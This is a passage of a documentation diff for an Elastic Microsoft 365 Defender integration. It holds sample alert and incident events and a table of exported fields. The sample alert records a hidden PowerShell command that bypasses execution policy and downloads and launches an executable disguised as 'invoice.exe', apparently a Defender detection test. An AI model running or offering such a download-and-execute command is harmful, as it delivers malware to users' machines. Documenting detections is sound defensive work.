omainName\":\"AzureAD\",\"userPrincipalName\":null,\"userSid\":\"S-1-12-1-1485667349-1150190949-4065799612-2328216759\"},\"verdict\":\"unknown\"},{\"@odata.type\":\"#microsoft.graph.security.urlEvidence\",\"createdDateTime\":\"2023-10-20T09:53:10.1933333Z\",\"detailedRoles\":[],\"remediationStatus\":\"none\",\"remediationStatusDetails\":null,\"roles\":[],\"tags\":[],\"url\":\"http://127.0.0.1/1.exe\",\"verdict\":\"suspicious\"},{\"@odata.type\":\"#microsoft.g
raph.security.ipEvidence\",\"countryLetterCode\":null,\"createdDateTime\":\"2023-10-20T09:53:10.1933333Z\",\"detailedRoles\":[],\"ipAddress\":\"127.0.0.1\",\"remediationStatus\":\"none\",\"remediationStatusDetails\":null,\"roles\":[],\"tags\":[],\"verdict\":\"suspicious\"},{\"@odata.type\":\"#microsoft.graph.security.processEvidence\",\"createdDateTime\":\"2023-10-20T09:53:10.1933333Z\",\"detailedRoles\":[],\"detectionStatus\":\"detected\",\"imageFile\":{\"fileName\":\"powershell.exe\",\"filePath\":\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\",\"filePublisher\":\"Microsoft Corporation\",\"fileSize\":491520,\"issuer\":null,\"sha1\":\"a72c41316307889e43fe8605a0dca4a72e72a011\",\"sha256\":\"d783ba6567faf10fdff2d0ea3864f6756862d6c733c7f4467283da81aedc3a80\",\"signer\":null},\"mdeDeviceId\":\"505d70d89cfa3428f7aac7d2eb3a64c60fd3d843\",\"parentProcessCreationDateTime\":\"2023-10-20T09:51:19.5064237Z\",\"parentProcessId\":5772,\"parentProcessImageFile\":{\"fileName\":\"cmd.exe\",\"filePath\":\"C:\\\\Windows\\\\System32\",\"filePublisher\":\"Microsoft Corporation\",\"fileSize\":323584,\"issuer\":null,\"sha1\":null,\"sha256\":null,\"signer\":null},\"processCommandLine\":\"powershell.exe -NoExit -ExecutionPolicy Bypass -WindowStyle Hidden $ErrorActionPreference= 'silentlycontinue';(New-Object System.Net.WebClient).DownloadFile('http://127.0.0.1/1.exe', 'C:\\\\\\\\test-WDATP-test\\\\\\\\invoice.exe');Start-Process 
'C:\\\\\\\\test-WDATP-test\\\\\\\\invoice.exe'\",\"processCreationDateTime\":\"2023-10-20T09:51:39.4997961Z\",\"processId\":8224,\"remediationStatus\":\"none\",\"remediationStatusDetails\":null,\"roles\":[],\"tags\":[],\"userAccount\":{\"accountName\":\"CDPUserIS-38411\",\"azureAdUserId\":null,\"displayName\":null,\"domainName\":\"AzureAD\",\"userPrincipalName\":null,\"userSid\":\"S-1-12-1-1485667349-1150190949-4065799612-2328216759\"},\"verdict\":\"unknown\"}],\"firstActivityDateTime\":\"2023-10-20T09:51:39.5154802Z\",\"id\":\"daefa1828b-dd4e-405c-8a3b-aa28596830dd_1\",\"incidentId\":\"23\",\"incidentWebUrl\":\"https://security.microsoft.com/incidents/23?tid=3adb963c-8e61-48e8-a06d-6dbb0dacea39\",\"lastActivityDateTime\":\"2023-10-20T09:51:41.9939003Z\",\"lastUpdateDateTime\":\"2023-10-20T09:54:07.5033333Z\",\"mitreTechniques\":[\"T1059.001\"],\"productName\":\"Microsoft Defender for Endpoint\",\"providerAlertId\":\"efa1828b-dd4e-405c-8a3b-aa28596830dd_1\",\"recommendedActions\":\"1. Examine the PowerShell command line to understand what commands were executed. Note: the content may need to be decoded if it is Base64-encoded.\\n2. Search the script for more indicators to investigate - for example IP addresses (potential C\\u0026C servers), target computers etc.\\n3. Explore the timeline of this and other related machines for additional suspect activities around the time of the alert.\\n4. Look for the process that invoked this PowerShell run and their origin. 
Consider submitting any suspect files in the chain for deep analysis for detailed behavior information.\",\"resolvedDateTime\":null,\"serviceSource\":\"microsoftDefenderForEndpoint\",\"severity\":\"medium\",\"status\":\"new\",\"tenantId\":\"3adb963c-8e61-48e8-a06d-6dbb0dacea39\",\"threatDisplayName\":null,\"threatFamilyName\":null,\"title\":\"Suspicious PowerShell command line\"}", + "provider": "microsoftDefenderForEndpoint", + "severity": 3, + "start": "2023-10-20T09:51:39.515Z", + "type": [ + "info" + ], + "url": "https://security.microsoft.com/alerts/daefa1828b-dd4e-405c-8a3b-aa28596830dd_1?tid=3adb963c-8e61-48e8-a06d-6dbb0dacea39" + }, + "host": { + "id": [ + "505d70d89cfa3428f7aac7d2eb3a64c60fd3d843" + ], + "ip": [ + "127.0.0.1" + ], + "os": { + "name": [ + "Windows11" + ], + "version": [ + "22H2" + ] + } + }, + "input": { + "type": "httpjson" + }, + "m365_defender": { + "alert": { + "category": "Execution", + "created_datetime": "2023-10-20T09:53:09.883Z", + "description": "A suspicious PowerShell activity was observed on the machine. \nThis behavior may indicate that PowerShell was used during installation, exploration, or in some cases in lateral movement activities which are used by attackers to invoke modules, download external payloads, or get more information about the system. 
Attackers usually use PowerShell to bypass security protection mechanisms by executing their payload in memory without touching the disk and leaving any trace.", + "detection_source": "microsoftDefenderForEndpoint", + "detector_id": "7f1c3609-a3ff-40e2-995b-c01770161d68", + "evidence": [ + { + "azure_ad_device_id": "f18bd540-d5e4-46e0-8ddd-3d03a59e4e14", + "created_datetime": "2023-10-20T09:53:10.193Z", + "defender_av_status": "notSupported", + "detailed_roles": [ + "PrimaryDevice" + ], + "device_dns_name": "clw555test", + "first_seen_datetime": "2023-10-20T09:50:17.738Z", + "health_status": "inactive", + "ip_interfaces": [ + "192.168.5.65", + "fe80::cfe4:80b:615c:38fb", + "127.0.0.1", + "::1" + ], + "logged_on_users": [ + { + "account_name": "CDPUserIS-38411", + "domain_name": "AzureAD" + } + ], + "mde_device_id": "505d70d89cfa3428f7aac7d2eb3a64c60fd3d843", + "odata_type": "#microsoft.graph.security.deviceEvidence", + "onboarding_status": "onboarded", + "os_build": "22621", + "os_platform": "Windows11", + "rbac_group": { + "id": "0" + }, + "remediation_status": "none", + "risk_score": "high", + "verdict": "unknown", + "version": "22H2" + }, + { + "created_datetime": "2023-10-20T09:53:10.193Z", + "odata_type": "#microsoft.graph.security.userEvidence", + "remediation_status": "none", + "user_account": { + "account_name": "CDPUserIS-38411", + "domain_name": "AzureAD", + "user_sid": "S-1-12-1-1485667349-1150190949-4065799612-2328216759" + }, + "verdict": "unknown" + }, + { + "created_datetime": "2023-10-20T09:53:10.193Z", + "odata_type": "#microsoft.graph.security.urlEvidence", + "remediation_status": "none", + "url": "http://127.0.0.1/1.exe", + "verdict": "suspicious" + }, + { + "created_datetime": "2023-10-20T09:53:10.193Z", + "ip_address": "127.0.0.1", + "odata_type": "#microsoft.graph.security.ipEvidence", + "remediation_status": "none", + "verdict": "suspicious" + }, + { + "created_datetime": "2023-10-20T09:53:10.193Z", + "detection_status": "detected", + 
"image_file": { + "name": "powershell.exe", + "path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0", + "publisher": "Microsoft Corporation", + "sha1": "a72c41316307889e43fe8605a0dca4a72e72a011", + "sha256": "d783ba6567faf10fdff2d0ea3864f6756862d6c733c7f4467283da81aedc3a80", + "size": 491520 + }, + "mde_device_id": "505d70d89cfa3428f7aac7d2eb3a64c60fd3d843", + "odata_type": "#microsoft.graph.security.processEvidence", + "parent_process": { + "creation_datetime": "2023-10-20T09:51:19.506Z", + "id": 5772, + "image_file": { + "name": "cmd.exe", + "path": "C:\\Windows\\System32", + "publisher": "Microsoft Corporation", + "size": 323584 + } + }, + "process": { + "command_line": "powershell.exe -NoExit -ExecutionPolicy Bypass -WindowStyle Hidden $ErrorActionPreference= 'silentlycontinue';(New-Object System.Net.WebClient).DownloadFile('http://127.0.0.1/1.exe', 'C:\\\\test-WDATP-test\\\\invoice.exe');Start-Process 'C:\\\\test-WDATP-test\\\\invoice.exe'", + "creation_datetime": "2023-10-20T09:51:39.499Z", + "id": 8224 + }, + "remediation_status": "none", + "user_account": { + "account_name": "CDPUserIS-38411", + "domain_name": "AzureAD", + "user_sid": "S-1-12-1-1485667349-1150190949-4065799612-2328216759" + }, + "verdict": "unknown" + } + ], + "first_activity_datetime": "2023-10-20T09:51:39.515Z", + "id": "daefa1828b-dd4e-405c-8a3b-aa28596830dd_1", + "incident_id": "23", + "incident_web_url": { + "domain": "security.microsoft.com", + "original": "https://security.microsoft.com/incidents/23?tid=3adb963c-8e61-48e8-a06d-6dbb0dacea39", + "path": "/incidents/23", + "query": "tid=3adb963c-8e61-48e8-a06d-6dbb0dacea39", + "scheme": "https" + }, + "last_activity_datetime": "2023-10-20T09:51:41.993Z", + "last_update_datetime": "2023-10-20T09:54:07.503Z", + "mitre_techniques": [ + "T1059.001" + ], + "provider_alert_id": "efa1828b-dd4e-405c-8a3b-aa28596830dd_1", + "recommended_actions": "1. Examine the PowerShell command line to understand what commands were executed. 
Note: the content may need to be decoded if it is Base64-encoded.\n2. Search the script for more indicators to investigate - for example IP addresses (potential C&C servers), target computers etc.\n3. Explore the timeline of this and other related machines for additional suspect activities around the time of the alert.\n4. Look for the process that invoked this PowerShell run and their origin. Consider submitting any suspect files in the chain for deep analysis for detailed behavior information.", + "service_source": "microsoftDefenderForEndpoint", + "severity": "medium", + "status": "new", + "tenant_id": "3adb963c-8e61-48e8-a06d-6dbb0dacea39", + "title": "Suspicious PowerShell command line", + "web_url": { + "domain": "security.microsoft.com", + "original": "https://security.microsoft.com/alerts/daefa1828b-dd4e-405c-8a3b-aa28596830dd_1?tid=3adb963c-8e61-48e8-a06d-6dbb0dacea39", + "path": "/alerts/daefa1828b-dd4e-405c-8a3b-aa28596830dd_1", + "query": "tid=3adb963c-8e61-48e8-a06d-6dbb0dacea39", + "scheme": "https" + } + } + }, + "message": "A suspicious PowerShell activity was observed on the machine. \nThis behavior may indicate that PowerShell was used during installation, exploration, or in some cases in lateral movement activities which are used by attackers to invoke modules, download external payloads, or get more information about the system. 
Attackers usually use PowerShell to bypass security protection mechanisms by executing their payload in memory without touching the disk and leaving any trace.", + "process": { + "command_line": [ + "powershell.exe -NoExit -ExecutionPolicy Bypass -WindowStyle Hidden $ErrorActionPreference= 'silentlycontinue';(New-Object System.Net.WebClient).DownloadFile('http://127.0.0.1/1.exe', 'C:\\\\test-WDATP-test\\\\invoice.exe');Start-Process 'C:\\\\test-WDATP-test\\\\invoice.exe'" + ], + "hash": { + "sha1": [ + "a72c41316307889e43fe8605a0dca4a72e72a011" + ], + "sha256": [ + "d783ba6567faf10fdff2d0ea3864f6756862d6c733c7f4467283da81aedc3a80" + ] + }, + "parent": { + "pid": [ + 5772 + ], + "start": [ + "2023-10-20T09:51:19.506Z" + ] + }, + "pid": [ + 8224 + ], + "start": [ + "2023-10-20T09:51:39.499Z" + ], + "user": { + "name": [ + "CDPUserIS-38411" + ] + } + }, + "related": { + "hash": [ + "a72c41316307889e43fe8605a0dca4a72e72a011", + "d783ba6567faf10fdff2d0ea3864f6756862d6c733c7f4467283da81aedc3a80" + ], + "hosts": [ + "505d70d89cfa3428f7aac7d2eb3a64c60fd3d843", + "Windows11", + "22H2", + "clw555test", + "AzureAD" + ], + "ip": [ + "127.0.0.1" + ], + "user": [ + "CDPUserIS-38411", + "S-1-12-1-1485667349-1150190949-4065799612-2328216759" + ] + }, + "tags": [ + "preserve_original_event", + "preserve_duplicate_custom_fields", + "forwarded", + "m365_defender-alert" + ], + "threat": { + "tactic": { + "name": [ + "Execution" + ] + }, + "technique": { + "subtechnique": { + "id": [ + "T1059.001" + ] + } + } + }, + "user": { + "domain": [ + "AzureAD" + ], + "name": [ + "CDPUserIS-38411" + ] + } +} +``` + +**Exported fields** + +| Field | Description | Type | +|---|---|---| +| @timestamp | Event timestamp. | date | +| data_stream.dataset | Data stream dataset. | constant_keyword | +| data_stream.namespace | Data stream namespace. | constant_keyword | +| data_stream.type | Data stream type. | constant_keyword | +| event.dataset | Event dataset. 
| constant_keyword | +| event.module | Event module. | constant_keyword | +| input.type | Type of filebeat input. | keyword | +| log.offset | Log offset. | long | +| m365_defender.alert.actor_display_name | The adversary or activity group that is associated with this alert. | keyword | +| m365_defender.alert.assigned_to | Owner of the alert, or null if no owner is assigned. | keyword | +| m365_defender.alert.category | The attack kill-chain category that the alert belongs to. Aligned with the MITRE ATT&CK framework. | keyword | +| m365_defender.alert.classification | Specifies whether the alert represents a true threat. Possible values are: unknown, falsePositive, truePositive, benignPositive, unknownFutureValue. | keyword | +| m365_defender.alert.comments | Array of comments created by the Security Operations (SecOps) team during the alert management process. | flattened | +| m365_defender.alert.created_datetime | Time when Microsoft 365 Defender created the alert. | date | +| m365_defender.alert.description | String value describing each alert. | keyword | +| m365_defender.alert.detection_source | Detection technology or sensor that identified the notable component or activity. | keyword | +| m365_defender.alert.detector_id | The ID of the detector that triggered the alert. | keyword | +| m365_defender.alert.determination | Specifies the result of the investigation, whether the alert represents a true attack and if so, the nature of the attack. Possible values are: unknown, apt, malware, securityPersonnel, securityTesting, unwantedSoftware, other, multiStagedAttack, compromisedUser, phishing, maliciousUserActivity, clean, insufficientData, confirmedUserActivity, lineOfBusinessApplication, unknownFutureValue. | keyword | +| m365_defender.alert.evidence.antispam_direction | Direction of the email relative to your network. The possible values are: Inbound, Outbound or Intraorg. 
| keyword | +| m365_defender.alert.evidence.app_id | Unique identifier of the application. | keyword | +| m365_defender.alert.evidence.attachments_count | Number of attachments in the email. | long | +| m365_defender.alert.evidence.azure_ad_device_id | A unique identifier assigned to a device by Azure Active Directory (Azure AD) when device is Azure AD-joined. | keyword | +| m365_defender.alert.evidence.cluster_by | The clustering logic of the emails inside the cluster. | keyword | +| m365_defender.alert.evidence.cluster_by_value | The value utilized to cluster the similar emails. | keyword | +| m365_defender.alert.evidence.created_datetime | The time the evidence was created and added to the alert. | date | +| m365_defender.alert.evidence.defender_av_status | State of the Defender AntiMalware engine. The possible values are: notReporting, disabled, notUpdated, updated, unknown, notSupported, unknownFutureValue. | keyword | +| m365_defender.alert.evidence.delivery_action | Delivery action of the email. The possible values are: Delivered, DeliveredAsSpam, Junked, Blocked, or Replaced. | keyword | +| m365_defender.alert.evidence.delivery_location | Location where the email was delivered. The possible values are: Inbox, External, JunkFolder, Quarantine, Failed, Dropped, DeletedFolder or Forwarded. | keyword | +| m365_defender.alert.evidence.detailed_roles | Detailed roles of the user associated with the event. | keyword | +| m365_defender.alert.evidence.detection_status | The status of the detection.The possible values are: detected, blocked, prevented, unknownFutureValue. | keyword | +| m365_defender.alert.evidence.device_dns_name | The fully qualified domain name (FQDN) for the device. | keyword | +| m365_defender.alert.evidence.display_name | Name of the application. | keyword | +| m365_defender.alert.evidence.email_count | Count of emails in the email cluster. 
| long | +| m365_defender.alert.evidence.file_details.issuer | The certificate authority (CA) that issued the certificate. | keyword | +| m365_defender.alert.evidence.file_details.name | The name of the file. | keyword | +| m365_defender.alert.evidence.file_details.odata_type | | keyword | +| m365_defender.alert.evidence.file_details.path | The file path (location) of the file instance. | keyword | +| m365_defender.alert.evidence.file_details.publisher | The publisher of the file. | keyword | +| m365_defender.alert.evidence.file_details.sha1 | The Sha1 cryptographic hash of the file content. | keyword | +| m365_defender.alert.evidence.file_details.sha256 | The Sha256 cryptographic hash of the file content. | keyword | +| m365_defender.alert.evidence.file_details.signer | The signer of the signed file. | keyword | +| m365_defender.alert.evidence.file_details.size | The size of the file in bytes. | long | +| m365_defender.alert.evidence.first_seen_datetime | The date and time when the device was first seen. | date | +| m365_defender.alert.evidence.health_status | The health state of the device.The possible values are: active, inactive, impairedCommunication, noSensorData, noSensorDataImpairedCommunication, unknown, unknownFutureValue. | keyword | +| m365_defender.alert.evidence.image_file.issuer | The certificate authority (CA) that issued the certificate. | keyword | +| m365_defender.alert.evidence.image_file.name | The name of the file. | keyword | +| m365_defender.alert.evidence.image_file.odata_type | | keyword | +| m365_defender.alert.evidence.image_file.path | The file path (location) of the file instance. | keyword | +| m365_defender.alert.evidence.image_file.publisher | The publisher of the file. | keyword | +| m365_defender.alert.evidence.image_file.sha1 | The Sha1 cryptographic hash of the file content. | keyword | +| m365_defender.alert.evidence.image_file.sha256 | The Sha256 cryptographic hash of the file content. 
| keyword | +| m365_defender.alert.evidence.image_file.signer | The signer of the signed file. | keyword | +| m365_defender.alert.evidence.image_file.size | The size of the file in bytes. | long | +| m365_defender.alert.evidence.instance_id | Identifier of the instance of the Software as a Service (SaaS) application. | keyword | +| m365_defender.alert.evidence.instance_name | Name of the instance of the SaaS application. | keyword | +| m365_defender.alert.evidence.internet_message_id | Public-facing identifier for the email that is set by the sending email system. | keyword | +| m365_defender.alert.evidence.ip_address | The value of the IP Address, can be either in V4 address or V6 address format. | ip | +| m365_defender.alert.evidence.ip_interfaces | IP Interfaces related to the event. | ip | +| m365_defender.alert.evidence.language | Detected language of the email content. | keyword | +| m365_defender.alert.evidence.logged_on_users.account_name | User account name of the logged-on user. | keyword | +| m365_defender.alert.evidence.logged_on_users.domain_name | User account domain of the logged-on user. | keyword | +| m365_defender.alert.evidence.logged_on_users.odata_type | | keyword | +| m365_defender.alert.evidence.mde_device_id | A unique identifier assigned to a device by Microsoft Defender for Endpoint. | keyword | +| m365_defender.alert.evidence.network_message_id | Unique identifier for the email, generated by Microsoft 365. | keyword | +| m365_defender.alert.evidence.network_message_ids | Unique identifiers for the emails in the cluster, generated by Microsoft 365. | keyword | +| m365_defender.alert.evidence.object_id | The unique identifier of the application object in Azure AD. 
| keyword | +| m365_defender.alert.evidence.odata_type | | keyword | +| m365_defender.alert.evidence.onboarding_status | The status of the machine onboarding to Microsoft Defender for Endpoint.The possible values are: insufficientInfo, onboarded, canBeOnboarded, unsupported, unknownFutureValue. | keyword | +| m365_defender.alert.evidence.os_build | The build version for the operating system the device is running. | keyword | +| m365_defender.alert.evidence.os_platform | The operating system platform the device is running. | keyword | +| m365_defender.alert.evidence.p1_sender.display_name | The name of the sender. | keyword | +| m365_defender.alert.evidence.p1_sender.domain_name | Sender domain. | keyword | +| m365_defender.alert.evidence.p1_sender.email_address | Sender email address. | keyword | +| m365_defender.alert.evidence.p1_sender.odata_type | | keyword | +| m365_defender.alert.evidence.p2_sender.display_name | The name of the sender. | keyword | +| m365_defender.alert.evidence.p2_sender.domain_name | Sender domain. | keyword | +| m365_defender.alert.evidence.p2_sender.email_address | Sender email address. | keyword | +| m365_defender.alert.evidence.p2_sender.odata_type | | keyword | +| m365_defender.alert.evidence.parent_process.creation_datetime | Date and time when the parent of the process was created. | date | +| m365_defender.alert.evidence.parent_process.id | Process ID (PID) of the parent process that spawned the process. | long | +| m365_defender.alert.evidence.parent_process.image_file.issuer | The certificate authority (CA) that issued the certificate. | keyword | +| m365_defender.alert.evidence.parent_process.image_file.name | The name of the file. | keyword | +| m365_defender.alert.evidence.parent_process.image_file.odata_type | | keyword | +| m365_defender.alert.evidence.parent_process.image_file.path | The file path (location) of the file instance. 
| keyword | +| m365_defender.alert.evidence.parent_process.image_file.publisher | The publisher of the file. | keyword | +| m365_defender.alert.evidence.parent_process.image_file.sha1 | The Sha1 cryptographic hash of the file content. | keyword | +| m365_defender.alert.evidence.parent_process.image_file.sha256 | The Sha256 cryptographic hash of the file content. | keyword | +| m365_defender.alert.evidence.parent_process.image_file.signer | The signer of the signed file. | keyword | +| m365_defender.alert.evidence.parent_process.image_file.size | The size of the file in bytes. | long | +| m365_defender.alert.evidence.primary_address | The primary email address of the mailbox. | keyword | +| m365_defender.alert.evidence.process.command_line | Command line used to create the new process. | keyword | +| m365_defender.alert.evidence.process.creation_datetime | Date and time the process was created. | date | +| m365_defender.alert.evidence.process.id | Process ID (PID) of the newly created process. | long | +| m365_defender.alert.evidence.publisher | The name of the application publisher. | keyword | +| m365_defender.alert.evidence.query | The query used to identify the email cluster. | keyword | +| m365_defender.alert.evidence.rbac_group.id | The ID of the role-based access control (RBAC) device group. | keyword | +| m365_defender.alert.evidence.rbac_group.name | The name of the RBAC device group. | keyword | +| m365_defender.alert.evidence.received_datetime | Date and time when the email was received. | date | +| m365_defender.alert.evidence.recipient_email_address | Email address of the recipient, or email address of the recipient after distribution list expansion. | keyword | +| m365_defender.alert.evidence.registry_hive | Registry hive of the key that the recorded action was applied to. | keyword | +| m365_defender.alert.evidence.registry_key | Registry key that the recorded action was applied to. 
| keyword | +| m365_defender.alert.evidence.registry_value | Data of the registry value that the recorded action was applied to. | keyword | +| m365_defender.alert.evidence.registry_value_name | Name of the registry value that the recorded action was applied to. | keyword | +| m365_defender.alert.evidence.registry_value_type | Data type, such as binary or string, of the registry value that the recorded action was applied to. | keyword | +| m365_defender.alert.evidence.remediation_status | Status of the remediation action taken. The possible values are: none, remediated, prevented, blocked, notFound, active, pendingApproval, declined, notRemediated, running, unknownFutureValue. | keyword | +| m365_defender.alert.evidence.remediation_status_details | Details about the remediation status. | keyword | +| m365_defender.alert.evidence.risk_score | Risk score as evaluated by Microsoft Defender for Endpoint. The possible values are: none, informational, low, medium, high, unknownFutureValue. | keyword | +| m365_defender.alert.evidence.roles | The role/s that an evidence entity represents in an alert, e.g., an IP address that is associated with an attacker will have the evidence role "Attacker". | keyword | +| m365_defender.alert.evidence.saas_app_id | The identifier of the SaaS application. | keyword | +| m365_defender.alert.evidence.security_group_id | Unique identifier of the security group. | keyword | +| m365_defender.alert.evidence.sender_ip | IP address of the last detected mail server that relayed the message. | ip | +| m365_defender.alert.evidence.subject | Subject of the email. | keyword | +| m365_defender.alert.evidence.tags | Array of custom tags associated with an evidence instance, for example to denote a group of devices, high value assets, etc. | keyword | +| m365_defender.alert.evidence.threat_detection_methods | Collection of methods used to detect malware, phishing, or other threats found in the email. 
| keyword | +| m365_defender.alert.evidence.threats | Collection of detection names for malware or other threats found. | keyword | +| m365_defender.alert.evidence.type | | keyword | +| m365_defender.alert.evidence.url | The Unique Resource Locator (URL). | keyword | +| m365_defender.alert.evidence.url_count | Number of embedded URLs in the email. | long | +| m365_defender.alert.evidence.urls | Collection of the URLs contained in this email. | keyword | +| m365_defender.alert.evidence.urn | Uniform resource name (URN) of the automated investigation where the cluster was identified. | keyword | +| m365_defender.alert.evidence.user_account.account_name | The user account's displayed name. | keyword | +| m365_defender.alert.evidence.user_account.azure_ad_user_id | The user object identifier in Azure AD. | keyword | +| m365_defender.alert.evidence.user_account.domain_name | The name of the Active Directory domain of which the user is a member. | keyword | +| m365_defender.alert.evidence.user_account.odata_type | | keyword | +| m365_defender.alert.evidence.user_account.user_principal_name | The user principal name of the account in Azure AD. | keyword | +| m365_defender.alert.evidence.user_account.user_sid | The local security identifier of the user account. | keyword | +| m365_defender.alert.evidence.verdict | The decision reached by automated investigation. The possible values are: unknown, suspicious, malicious, noThreatsFound, unknownFutureValue. | keyword | +| m365_defender.alert.evidence.version | The version of the operating system platform. | keyword | +| m365_defender.alert.evidence.vm_metadata.cloud_provider | The cloud provider hosting the virtual machine. The possible values are: unknown, azure, unknownFutureValue. | keyword | +| m365_defender.alert.evidence.vm_metadata.odata_type | | keyword | +| m365_defender.alert.evidence.vm_metadata.resource_id | Unique identifier of the Azure resource. 
| keyword | +| m365_defender.alert.evidence.vm_metadata.subscription_id | Unique identifier of the Azure subscription the customer tenant belongs to. | keyword | +| m365_defender.alert.evidence.vm_metadata.vm_id | Unique identifier of the virtual machine instance. | keyword | +| m365_defender.alert.first_activity_datetime | The earliest activity associated with the alert. | date | +| m365_defender.alert.id | Unique identifier to represent the alert resource. | keyword | +| m365_defender.alert.incident_id | Unique identifier to represent the incident this alert resource is associated with. | keyword | +| m365_defender.alert.incident_web_url.domain | | keyword | +| m365_defender.alert.incident_web_url.extension | | keyword | +| m365_defender.alert.incident_web_url.fragment | | keyword | +| m365_defender.alert.incident_web_url.full | | keyword | +| m365_defender.alert.incident_web_url.original | | keyword | +| m365_defender.alert.incident_web_url.password | | keyword | +| m365_defender.alert.incident_web_url.path | | keyword | +| m365_defender.alert.incident_web_url.port | | long | +| m365_defender.alert.incident_web_url.query | | keyword | +| m365_defender.alert.incident_web_url.scheme | | keyword | +| m365_defender.alert.incident_web_url.username | | keyword | +| m365_defender.alert.last_activity_datetime | The oldest activity associated with the alert. | date | +| m365_defender.alert.last_update_datetime | Time when the alert was last updated at Microsoft 365 Defender. | date | +| m365_defender.alert.mitre_techniques | The attack techniques, as aligned with the MITRE ATT&CK framework. | keyword | +| m365_defender.alert.odata_type | | keyword | +| m365_defender.alert.provider_alert_id | The ID of the alert as it appears in the security provider product that generated the alert. | keyword | +| m365_defender.alert.recommended_actions | Recommended response and remediation actions to take in the event this alert was generated. 
| keyword | +| m365_defender.alert.resolved_datetime | Time when the alert was resolved. | date | +| m365_defender.alert.service_source | The service or product that created this alert. Possible values are: microsoftDefenderForEndpoint, microsoftDefenderForIdentity, microsoftCloudAppSecurity, microsoftDefenderForOffice365, microsoft365Defender, aadIdentityProtection, appGovernance, dataLossPrevention. | keyword | +| m365_defender.alert.severity | Indicates the possible impact on assets. The higher the severity the bigger the impact. Typically higher severity items require the most immediate attention. Possible values are: unknown, informational, low, medium, high, unknownFutureValue. | keyword | +| m365_defender.alert.status | The status of the alert. Possible values are: new, inProgress, resolved, unknownFutureValue. | keyword | +| m365_defender.alert.tenant_id | The Azure Active Directory tenant the alert was created in. | keyword | +| m365_defender.alert.threat_display_name | The threat associated with this alert. | keyword | +| m365_defender.alert.threat_family_name | Threat family associated with this alert. | keyword | +| m365_defender.alert.title | Brief identifying string value describing the alert. | keyword | +| m365_defender.alert.web_url.domain | | keyword | +| m365_defender.alert.web_url.extension | | keyword | +| m365_defender.alert.web_url.fragment | | keyword | +| m365_defender.alert.web_url.full | | keyword | +| m365_defender.alert.web_url.original | | keyword | +| m365_defender.alert.web_url.password | | keyword | +| m365_defender.alert.web_url.path | | keyword | +| m365_defender.alert.web_url.port | | long | +| m365_defender.alert.web_url.query | | keyword | +| m365_defender.alert.web_url.scheme | | keyword | +| m365_defender.alert.web_url.username | | keyword | +| tags | User defined tags. | keyword | + + ### event This is the `event` dataset. 
@@ -547,11 +1030,11 @@ An example event for `incident` looks as following:
 {
 "@timestamp": "2021-09-30T09:35:45.113Z",
 "agent": {
- "ephemeral_id": "bfa54030-e0ce-4076-86d5-90314cd5425d",
- "id": "b749ee7f-378d-45d8-8151-975dfa11ce57",
+ "ephemeral_id": "b25e1419-d728-4361-8b2c-b147f421b7c9",
+ "id": "5aad2f43-374a-4a11-a080-b8039c1ee9a1",
 "name": "docker-fleet-agent",
 "type": "filebeat",
- "version": "8.8.2"
+ "version": "8.13.0"
 },
 "cloud": {
 "account": {
@@ -570,9 +1053,9 @@ An example event for `incident` looks as following:
 "version": "8.11.0"
 },
 "elastic_agent": {
- "id": "b749ee7f-378d-45d8-8151-975dfa11ce57",
- "snapshot": false,
- "version": "8.8.2"
+ "id": "5aad2f43-374a-4a11-a080-b8039c1ee9a1",
+ "snapshot": true,
+ "version": "8.13.0"
 },
 "event": {
 "action": [
@@ -582,7 +1065,7 @@ An example event for `incident` looks as following: "created": "2021-08-13T08:43:35.553Z", "dataset": "m365_defender.incident", "id": "2972395", - "ingested": "2023-07-21T12:35:09Z", + "ingested": "2024-01-17T16:05:30Z", "kind": "alert", "original": "{\"@odata.type\":\"#microsoft.graph.security.incident\",\"alerts\":{\"@odata.type\":\"#microsoft.graph.security.alert\",\"actorDisplayName\":null,\"alertWebUrl\":\"https://security.microsoft.com/alerts/da637551227677560813_-961444813?tid=b3c1b5fc-828c-45fa-a1e1-10d74f6d6e9c\",\"assignedTo\":null,\"category\":\"DefenseEvasion\",\"classification\":\"unknown\",\"comments\":[],\"createdDateTime\":\"2021-04-27T12:19:27.7211305Z\",\"description\":\"A hidden file has been launched. This activity could indicate a compromised host. Attackers often hide files associated with malicious tools to evade file system inspection and defenses.\",\"detectionSource\":\"antivirus\",\"detectorId\":\"e0da400f-affd-43ef-b1d5-afc2eb6f2756\",\"determination\":\"unknown\",\"evidence\":[{\"@odata.type\":\"#microsoft.graph.security.deviceEvidence\",\"azureAdDeviceId\":null,\"createdDateTime\":\"2021-04-27T12:19:27.7211305Z\",\"defenderAvStatus\":\"unknown\",\"deviceDnsName\":\"tempDns\",\"firstSeenDateTime\":\"2020-09-12T07:28:32.4321753Z\",\"healthStatus\":\"active\",\"loggedOnUsers\":[],\"mdeDeviceId\":\"73e7e2de709dff64ef64b1d0c30e67fab63279db\",\"onboardingStatus\":\"onboarded\",\"osBuild\":22424,\"osPlatform\":\"Windows10\",\"rbacGroupId\":75,\"rbacGroupName\":\"UnassignedGroup\",\"remediationStatus\":\"none\",\"remediationStatusDetails\":null,\"riskScore\":\"medium\",\"roles\":[\"compromised\"],\"tags\":[\"Test 
Machine\"],\"verdict\":\"unknown\",\"version\":\"Other\",\"vmMetadata\":{\"cloudProvider\":\"azure\",\"resourceId\":\"/subscriptions/8700d3a3-3bb7-4fbe-a090-488a1ad04161/resourceGroups/WdatpApi-EUS-STG/providers/Microsoft.Compute/virtualMachines/NirLaviTests\",\"subscriptionId\":\"8700d3a3-3bb7-4fbe-a090-488a1ad04161\",\"vmId\":\"ca1b0d41-5a3b-4d95-b48b-f220aed11d78\"}},{\"@odata.type\":\"#microsoft.graph.security.fileEvidence\",\"createdDateTime\":\"2021-04-27T12:19:27.7211305Z\",\"detectionStatus\":\"detected\",\"fileDetails\":{\"fileName\":\"MsSense.exe\",\"filePath\":\"C:\\\\Program Files\\\\temp\",\"filePublisher\":\"Microsoft 